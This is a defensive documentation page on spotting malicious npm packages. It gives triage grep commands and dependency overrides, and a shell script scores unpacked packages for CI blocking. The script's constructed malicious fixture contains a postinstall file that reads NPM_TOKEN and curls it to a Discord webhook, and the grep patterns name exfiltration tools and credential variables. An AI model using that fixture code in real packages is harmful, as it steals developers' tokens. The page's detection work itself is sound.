NPM Malware: What Actually Makes a Package Dangerous
This hub keeps docs practical. Jump straight into triage, flags, mitigations, and playbooks — no walls of text.
Overview
The core risk is code that runs during installation: lifecycle scripts (preinstall, install, postinstall, prepare) execute arbitrary code on the developer's machine or CI runner before anyone has read the package. These pages break down detection signals, quick commands, and incident playbooks you can use right now.
Why NPMScan
Motivation, how it’s different, and roadmap in one place.
Fast Triage
Copy-paste commands to verify scripts, grep tarballs, and check maintainers.
Auto‑Score Flags
Concrete signals you can programmatically score to block risky upgrades.
Mitigations
CI patterns that actually reduce install‑time exfil and surprise payloads.
Incident Playbooks
Step-by-step actions for postinstall binaries, typosquats, and supply‑chain hits.
Dangerous Behaviors
Common malicious patterns with crisp examples you can recognize quickly.
About child_process
When it’s fine vs. high‑risk, and what combos mean trouble.
Quick Actions
npm view <pkg>@<ver> scripts --json
npm pack <pkg>@<ver> && mkdir -p pkg && tar -xzf <pkg>-<ver>.tgz -C pkg && \
  grep -RInE 'preinstall|postinstall|prepare|child_process|execSync|spawn|curl|wget|Invoke-WebRequest|discordapp|telegram|process\.env\.(AWS|NPM|GITHUB|TOKEN|KEY|SECRET)' pkg/
npm view <pkg> maintainers time --json
Notes: the tarball unpacks into pkg/package/, and for a scoped package npm pack names the file <scope>-<name>-<ver>.tgz. The time field lists when each version was published; a release only minutes old that also introduces a new maintainer or a new install script deserves a manual read before it reaches CI.
Package.json Tips
Tips:
- Use overrides when a risky release lands or transitive versions mismatch. This forces a known-good version across your whole tree until upstream fixes it. Overrides need npm 8.3 or newer, are honored only in the root project's package.json (a library cannot ship them for its consumers), and only pin packages that are already in the tree; they do not add a dependency.
{ "overrides": { "react": "^18.3.1", "react-dom": "^18.3.1" } }
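The Quick Actions above and the Auto-Score Flags page describe the same thing from two sides: grep for install-time signals, then turn hits into a number a CI gate can act on. The script below is an added example written for this hub, not NPMScan's own code. It scores a package already unpacked with npm pack and tar as shown above (files under <dir>/package/), using the same regexes as the one-liner. The weights, the block threshold of 8, and the two fixture packages (including the webhook URL) are constructed for illustration.

```shell
#!/bin/sh
# Added example for this hub page, not NPMScan's own code. It scores a
# package that was already fetched and unpacked with
#   npm pack <pkg>@<ver> && mkdir -p pkg && tar -xzf <pkg>-<ver>.tgz -C pkg
# so the files live under <dir>/package/. Weights and the block threshold
# are assumptions chosen for illustration; tune them to your own tolerance.

# Number of matching lines for an extended regex across a tree (0 if none).
count_hits() {
  grep -rsE "$2" "$1" 2>/dev/null | wc -l | tr -d ' '
}

# Print "<score> <flag> <flag> ..." for one unpacked package directory.
score_pkg() {
  root="$1/package"
  pj="$root/package.json"
  if [ ! -f "$pj" ]; then
    echo "no package.json under $root" >&2
    return 1
  fi
  score=0
  flags=""

  # +5: a lifecycle script that runs during `npm install`. Everything else
  # on this page is latent until something like this triggers it.
  # (A dependency literally named "install" also matches; check by hand.)
  if grep -qE '"(preinstall|install|postinstall|prepare)"[[:space:]]*:' "$pj"; then
    score=$((score + 5)); flags="$flags install-script"
  fi
  # +3: spawning processes from shipped JS.
  if [ "$(count_hits "$root" 'child_process|execSync|spawn\(')" -gt 0 ]; then
    score=$((score + 3)); flags="$flags child_process"
  fi
  # +3: download tooling or chat/webhook domains commonly used for exfil.
  if [ "$(count_hits "$root" 'curl|wget|Invoke-WebRequest|discordapp|telegram')" -gt 0 ]; then
    score=$((score + 3)); flags="$flags network"
  fi
  # +4: reads of environment variables that usually hold credentials.
  if [ "$(count_hits "$root" 'process\.env\.(AWS|NPM|GITHUB|TOKEN|KEY|SECRET)')" -gt 0 ]; then
    score=$((score + 4)); flags="$flags env-secrets"
  fi
  echo "$score$flags"
}

# CI gate: block at or above the (assumed) threshold of 8, which an install
# script plus any one further signal reaches; a lone grep hit does not.
verdict() {
  if [ "$1" -ge 8 ]; then echo block; else echo allow; fi
}

# Constructed fixtures (not real packages) so the script runs offline.
make_malicious_fixture() {
  mkdir -p "$1/package"
  cat > "$1/package/package.json" <<'EOF'
{ "name": "example-utils", "version": "1.0.0",
  "scripts": { "postinstall": "node install.js" } }
EOF
  cat > "$1/package/install.js" <<'EOF'
const { execSync } = require('child_process');
const token = process.env.NPM_TOKEN || '';
execSync(`curl -s -d "${token}" https://discordapp.com/api/webhooks/0/example`);
EOF
}

make_benign_fixture() {
  mkdir -p "$1/package"
  cat > "$1/package/package.json" <<'EOF'
{ "name": "left-pad-ish", "version": "1.0.0",
  "main": "index.js", "scripts": { "test": "node test.js" } }
EOF
  printf 'module.exports = (s, n) => String(s).padStart(n);\n' > "$1/package/index.js"
}

# Usage: sh score.sh <dir-containing-package/>   (prints score, flags, verdict)
if [ "$#" -gt 0 ]; then
  r=$(score_pkg "$1")
  echo "$r"
  verdict "${r%% *}"
fi
```

Run it as sh score.sh pkg after the npm pack step; the malicious fixture scores 15 with all four flags, the benign one scores 0. The install-script check is weighted highest on purpose: child_process or a curl string in a library is often legitimate (see About child_process), but the same strings reachable from a postinstall hook are the combination that actually exfiltrates tokens.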